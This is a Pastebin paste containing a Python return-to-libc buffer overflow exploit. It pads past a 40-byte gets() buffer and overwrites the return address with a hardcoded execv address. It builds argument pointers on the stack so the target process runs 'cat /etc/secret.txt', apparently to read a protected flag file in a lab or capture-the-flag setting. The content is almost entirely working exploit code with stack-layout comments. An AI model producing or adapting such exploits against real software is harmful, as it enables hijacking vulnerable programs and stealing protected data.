Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import sys
- import struct
- import subprocess
- import re
- import resource
- # Command to execute
- command = [b"/usr/bin/cat", "/etc/secret.txt"]
- # Padding to overflow buffer + ebp so the next value on the stack is the return address
- padding = b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQR"
- assert len(padding) == 44, "padding should be 44 bytes long"
- # Stack (esp at time right before leave/ret function exit)
- #
- # [datap] arguments for first function
- # 4 bytes: 2nd return address
- # [esp] 4 bytes: return address
- # 4 bytes: old value of ebp
- # 40 bytes: size of gets() buffer
- esp = 0xffffd5ac
- datap = esp + 16
- return_address = 0xf7ed0ff0 # execv
- # Build data
- data = b""
- for arg in command: data += arg + '\0'
- data_len = 0
- for arg in command:
- data += struct.pack("@I", datap + data_len)
- data_len += len(arg) + 1
- data += struct.pack("@I", 0)
- # Build the stack
- stack = struct.pack("@I", return_address)
- stack += struct.pack("@I", 0xdeadbeef)
- stack += struct.pack("@I", datap)
- stack += struct.pack("@I", datap + data_len)
- assert datap == len(stack) + esp, "data pointer should point to stack above arguments"
- stack += data
- sys.stdout.write(padding + stack)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement